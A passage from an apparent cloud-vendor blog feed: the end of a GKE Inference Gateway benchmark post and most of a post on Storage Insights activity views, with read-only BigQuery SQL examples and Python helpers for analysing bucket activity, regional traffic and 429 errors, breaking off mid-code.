&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col/&gt;&lt;col/&gt;&lt;col/&gt;&lt;col/&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Third-party managed Kubernetes service&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE Advantage&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Mean output token throughput&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7,169.21 output tokens per second&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;6,042.05 output tokens per second&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;15.7% more output token throughput&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Mean time to first token (TTFT)&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;188.36 ms&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2,624.73 ms&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;92.8% less TTFT&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Mean inter-token &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;latency (ITL)&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;30.20 ms&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;81.03 ms&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;62.6% lower ITL&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 4: GKE with GKE Inference Gateway delivered higher output token throughput and lower latency for AI inference than a third-party managed Kubernetes service using a standard HTTP load balancer.&lt;/span&gt;&lt;/p&gt;
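&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a quick sanity check on the table, the sketch below recomputes the advantage column from the reported means. It is a minimal illustration, not the benchmark's methodology: the helper name pct is hypothetical, and the choice of denominator for each row is an assumption inferred from which one reproduces the published figure.&lt;/span&gt;&lt;/p&gt;

```python
# Reported means from the table above: (GKE, third-party managed Kubernetes service).
throughput_tps = (7169.21, 6042.05)   # output tokens per second, higher is better
ttft_ms = (188.36, 2624.73)           # time to first token, lower is better
itl_ms = (30.20, 81.03)               # inter-token latency, lower is better


def pct(part, whole):
    """Return part as a percentage of whole (hypothetical helper)."""
    return part / whole * 100


gke_tps, other_tps = throughput_tps
throughput_gap = gke_tps - other_tps

# Assumption: the published 15.7% matches the gap taken as a share of the GKE figure.
gap_vs_gke = pct(throughput_gap, gke_tps)
# The same gap measured against the third-party baseline is larger.
gap_vs_other = pct(throughput_gap, other_tps)

# Latency reductions are measured against the third-party (slower) value.
ttft_reduction = pct(ttft_ms[1] - ttft_ms[0], ttft_ms[1])
itl_reduction = pct(itl_ms[1] - itl_ms[0], itl_ms[1])

print(f"throughput gap vs GKE figure:  {gap_vs_gke:.1f}%")
print(f"throughput gap vs third party: {gap_vs_other:.1f}%")
print(f"TTFT reduction:                {ttft_reduction:.1f}%")
print(f"ITL reduction:                 {itl_reduction:.1f}%")
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With the rounded means shown in the table, the throughput gain measured against the third-party baseline works out to about 18.7%, and the ITL reduction to about 62.7% rather than 62.6%. The small ITL difference would be consistent with the published figure having been computed from unrounded measurements.&lt;/span&gt;&lt;/p&gt;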
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to accelerate your gen AI inference workloads?&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you’re deploying inference workloads such as real-time customer support agents, dynamic coding assistants, or sub-second fraud detection models, infrastructure latency dictates your user experience. By ensuring shared prompt prefixes hit the active cache nearly 100% of the time, GKE Inference Gateway transforms your LLMs from sluggish, expensive reasoning engines into rapid, capital-efficient, production-grade powerhouses.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to explore the performance advantage that GKE Inference Gateway can bring to your gen AI workloads? Access the full benchmark report &lt;/span&gt;&lt;a href="https://www.principledtechnologies.com/Google/GKE-Inference-Gateway-study-0526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and watch this explainer &lt;/span&gt;&lt;a href="https://youtu.be/RXX-LouimPY?si=dPGbP91TakSonOq9" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;video&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to learn more.&lt;/span&gt;&lt;/p&gt;
&lt;hr/&gt;
&lt;p&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;A special thanks to Dan Sullivan, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Senior Performance Architect&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, Principled Technologies.&lt;/span&gt;&lt;/em&gt;&lt;/sup&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/containers-kubernetes/gke-inference-gateway-prefix-caching-accelerates-ai-inference/</guid><category>Networking</category><category>AI &amp; Machine Learning</category><category>AI infrastructure</category><category>GKE</category><category>Containers &amp; Kubernetes</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Report: GKE Inference Gateway delivers up to 92% faster AI responses</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/containers-kubernetes/gke-inference-gateway-prefix-caching-accelerates-ai-inference/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Bob Tian</name><title>Software Engineer</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Susan Wu</name><title>Outbound Product Manager</title><department></department><company></company></author></item><item><title>Storage Insights datasets: Enabling org-wide operational discovery with activity insights</title><link>https://cloud.google.com/blog/products/storage-data-transfer/analyze-cloud-storage-estates-with-storage-insights-datasets/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As enterprise storage footprints scale to billions of objects, AI applications and agentic workloads are fundamentally shifting the role of storage from a passive repository to the foundation of the data platform. 
This is driven by a surge in unstructured model data and the billions of actions performed on those objects, including session logs and audit trails. To manage this and answer questions about cost, operations, and security, storage and platform admins need to go beyond knowing what data they have, to understanding exactly how it is being accessed, moved, and modified. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help, we're excited to announce activity insights within &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/insights/datasets"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Insights datasets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Now generally available, these new views provide visibility into the operational details of your Google Cloud Storage assets, enabling data-driven cost optimization and faster troubleshooting. For example, with activity insights, you can answer questions like:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Are my objects located in the right storage classes within my buckets?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Which regions does my bucket interact with the most, and is the bucket optimally located?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Where are errors occurring across operations in my storage estate, and why?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Answering these questions confidently is the key to unlocking cost optimizations and reclaiming engineering time. Storage Insights datasets&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, a feature of &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/storage-intelligence/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Cloud Storage&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, provides daily metadata and frequent activity insights (typically within four hours of the activity) so you have better visibility into your storage estate. While Storage Intelligence is a unified management product with capabilities like &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/bucket-relocation/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Bucket relocation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/batch-operations/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Batch operations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/analyze-data-gemini-cloud-assist"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Cloud Assist&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this blog focuses on how you can leverage Storage Insights datasets for operational optimization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What are Storage Insights datasets?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; deliver an automated, query-ready BigQuery index of your entire storage estate, complete with raw metadata and activity insights, replacing manual, error-prone data collection. Storage Insights datasets can be customized in scope: create a dataset for your entire org, a specific folder, a project, or a set of projects, or even specific buckets. The dataset then refreshes with regular updates, giving you a comprehensive view of your storage.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;From static metadata to live intelligence&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets are your go-to tool for understanding your storage &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;metadata&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, acting as an inventory management tool, scanning object metadata (storage class, location, age, custom metadata) and organizing it into a powerful, queryable BigQuery-linked dataset. This is crucial for knowing &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;what&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; data you have (learn more about how to optimize storage spend with Storage Insights datasets &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/storage-data-transfer/storage-insights-datasets-optimizes-storage-footprint?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;). &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But what if you also knew &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;how and when&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; that data is being used?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets now offer a set of new views that capture: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Object-level activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including writes, updates, deletes, and errors&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Bucket-level aggregate activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including total object operations, a breakdown by type of operations, total errors and most active prefixes&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Bucket-level regional traffic activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including ingress and egress bytes per region that interact with your bucket&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Project-level aggregate activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including total object operations, a breakdown by type of operations and total errors&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This data flows directly into new BigQuery views within your dataset so you can run analytics queries for specific insights, interact with the data via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/gemini-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or simply connect it to powerful &lt;/span&gt;&lt;a href="https://bit.ly/si-template" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Looker dashboards&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for visualization. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This moves you from a static snapshot to a dynamic, queryable analysis of your data's entire lifecycle. It's the difference between knowing &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;what's&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; in your warehouse and knowing &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;what’s used &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;and &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;when&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Three ways to use activity insights immediately&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s what you can do, starting today, with activity insights in Storage Insights datasets.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Right-size your storage estate&lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You have terabytes of data in Standard or Nearline class storage that you &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;believe&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; is cold. But without proof, moving it to Coldline or Archive class is risky. What if a critical process still needs to read it once per quarter?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; With the new Storage Insights datasets views that surface activity insights, you can now identify buckets that have had minimal read/write activity over the last 30, 60, or 90 days.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Apply or fine-tune lifecycle policies to transition this data to more cost-effective storage classes. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query that lists the buckets in your estate by request count over roughly the last six months, least active first:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;SELECT name, location, project, totalRequests
FROM
  `[project]`.`[dataset]`.`bucket_activity_view`
WHERE
  snapshotEndTime &amp;gt;= TIMESTAMP(DATE_SUB(DATE_TRUNC(CURRENT_DATE(), MONTH), INTERVAL 5 MONTH))
  AND snapshotEndTime &amp;lt; CURRENT_TIMESTAMP()
ORDER BY totalRequests ASC;

-- Running queries on datasets accrues BigQuery query costs; refer to the pricing page for further details.&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
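&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If the view returns more than one snapshot row per bucket, the results still need to be summed per bucket before you act on them. The sketch below shows one way to do that in Python. It assumes the rows have already been fetched as dictionaries carrying the name and totalRequests columns from the query; the function name, the sample rows, and the limit of two buckets are hypothetical.&lt;/span&gt;&lt;/p&gt;

```python
from collections import defaultdict


def least_active_buckets(rows, limit):
    """Sum totalRequests per bucket and return the `limit` quietest buckets.

    `rows` is assumed to be an iterable of dicts carrying the `name` and
    `totalRequests` columns selected by the query above.
    """
    totals = defaultdict(int)
    for row in rows:
        # A missing or NULL count is treated as zero requests (assumption).
        totals[row["name"]] += row.get("totalRequests") or 0
    # Sort ascending by request count, then by name for a stable order.
    ranked = sorted(totals.items(), key=lambda item: (item[1], item[0]))
    return ranked[:limit]


# Hypothetical sample rows, shaped like the query output.
sample_rows = [
    {"name": "logs-archive", "totalRequests": 0},
    {"name": "media-assets", "totalRequests": 1200},
    {"name": "logs-archive", "totalRequests": 3},
    {"name": "ml-checkpoints", "totalRequests": 45},
    {"name": "media-assets", "totalRequests": 900},
]

for bucket, total in least_active_buckets(sample_rows, limit=2):
    print(f"{bucket}: {total} requests")
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ranking instead of applying a fixed threshold keeps the sketch free of assumptions about what counts as cold for your workloads; review the quietest buckets against your own access requirements before changing lifecycle policies.&lt;/span&gt;&lt;/p&gt;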
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Architect for global performance with data-driven bucket placement&lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Your team set up a multi-region bucket to serve a global application. But a year later, is that still the right architecture? What if 99% of your traffic is now coming from a single region?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Analyze the access patterns in the new bucket_region_activity_view view. You can pinpoint which regions are driving read and write activity for the bucket.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Make data-driven decisions to co-locate your bucket with your compute. You might find that changing a multi-region bucket to a single-region one (or vice versa) can lead to significant cost savings and even improve performance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query to break down the egress and ingress traffic pattern for a bucket across regions: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;SELECT
  requestLocation,
  bucketLocation,
  SUM(requestBytes) AS total_request_bytes,
  SUM(responseBytes) AS total_response_bytes
FROM
  `[project]`.`[dataset]`.`bucket_region_activity_view`
WHERE
  name = '[bucket name]'
GROUP BY
  requestLocation,
  bucketLocation;

-- Running queries on datasets accrues BigQuery query costs; refer to the pricing page for further details.&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
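&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To answer the question of whether most traffic comes from a single region, the query output can be turned into per-region shares. The following Python sketch is one possible approach, assuming the rows are available as dictionaries with the requestLocation, total_request_bytes, and total_response_bytes columns from the query. The function name and the sample figures are hypothetical.&lt;/span&gt;&lt;/p&gt;

```python
from collections import defaultdict


def traffic_share_by_region(rows):
    """Return each request region's share of total bytes, as a percentage.

    `rows` is assumed to be an iterable of dicts with the `requestLocation`,
    `total_request_bytes`, and `total_response_bytes` columns from the query.
    """
    bytes_by_region = defaultdict(int)
    for row in rows:
        bytes_by_region[row["requestLocation"]] += (
            row["total_request_bytes"] + row["total_response_bytes"]
        )
    grand_total = sum(bytes_by_region.values())
    if grand_total == 0:
        # No traffic recorded, so there are no shares to report.
        return {}
    return {
        region: moved / grand_total * 100
        for region, moved in bytes_by_region.items()
    }


# Hypothetical rows for a multi-region bucket.
sample_rows = [
    {"requestLocation": "us-central1", "bucketLocation": "US",
     "total_request_bytes": 100, "total_response_bytes": 8900},
    {"requestLocation": "europe-west1", "bucketLocation": "US",
     "total_request_bytes": 50, "total_response_bytes": 450},
    {"requestLocation": "asia-east1", "bucketLocation": "US",
     "total_request_bytes": 0, "total_response_bytes": 500},
]

shares = traffic_share_by_region(sample_rows)
dominant = max(shares, key=shares.get)
print(f"{dominant} accounts for {shares[dominant]:.0f}% of bytes moved")
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The sketch combines request and response bytes into a single figure; if your costs are dominated by one direction of traffic, compute the shares for that column alone.&lt;/span&gt;&lt;/p&gt;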
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Shipt&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a retail technology platform and same-day delivery service, has been using Storage Intelligence capabilities to inform their data location decisions: &lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“Storage Intelligence enables us to efficiently manage over 2 billion objects, delivering cost and performance optimization. With Insights datasets, we detected and analyzed egress charges from multi-region buckets, identifying opportunities to improve efficiency by co-locating compute and storage. By leveraging the Bucket Relocate capability, we seamlessly moved 1.3 Petabytes of data from multi-region to regional storage, achieving substantial cost savings while maintaining uninterrupted application performance and data pipeline continuity.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;-&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Ron Cuirle, Director of Engineering - Cloud Platforms, Shipt&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Demystify and resolve operational hotspots &lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Your team sees a spike in 429 (Too Many Requests) errors. In a massive environment, this is rarely just a performance hiccup; it is also expensive. These errors trigger automatic retries, which often lead to a cycle of high-frequency, billable operations that drive up your Class A operation costs. Pinpointing exactly which object or prefix is causing the errors can be a time-consuming troubleshooting exercise.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The new Storage Insights datasets views provide granular details on these errors, right in BigQuery. You can query for 429 errors and see exactly which objects and prefixes are under pressure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can pinpoint the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;cause&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; of your 429 errors, moving your team from troubleshooting to resolution.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query that shows where 429 errors are occurring across your estate and why: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;SELECT
  requestOperation,
  errorReason,
  objectName,
  bucketName,
  requestCompletionTimestamp,
  project
FROM
  `[project]`.`[dataset]`.`object_events_view`
WHERE
  responseStatus = 429
ORDER BY
  requestCompletionTimestamp DESC;

-- Running queries on datasets accrues BigQuery query costs; refer to the pricing page for further details.&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
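&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The query lists individual 429 events; to see which prefixes are under pressure, those events can be grouped by bucket and object-name prefix. The Python sketch below illustrates the idea, assuming the rows are available as dictionaries with the bucketName and objectName columns from the query. The function name, the slash-based prefix convention, and the sample object names are hypothetical.&lt;/span&gt;&lt;/p&gt;

```python
from collections import Counter


def hottest_prefixes(rows, depth, top_n):
    """Count 429 rows per (bucket, object-name prefix) and return the top_n.

    `rows` is assumed to be an iterable of dicts with the `bucketName` and
    `objectName` columns from the query. The prefix is the first `depth`
    slash-separated segments of the object name (a hypothetical convention).
    """
    counts = Counter()
    for row in rows:
        segments = row["objectName"].split("/")
        # Drop the final segment (the object itself) before truncating.
        prefix = "/".join(segments[:-1][:depth])
        counts[(row["bucketName"], prefix)] += 1
    return counts.most_common(top_n)


# Hypothetical rows, shaped like the 429 query output.
sample_rows = [
    {"bucketName": "ingest", "objectName": "events/2026/06/09/a.json"},
    {"bucketName": "ingest", "objectName": "events/2026/06/09/b.json"},
    {"bucketName": "ingest", "objectName": "events/2026/06/08/c.json"},
    {"bucketName": "ingest", "objectName": "metrics/2026/d.json"},
    {"bucketName": "media", "objectName": "thumbs/e.png"},
]

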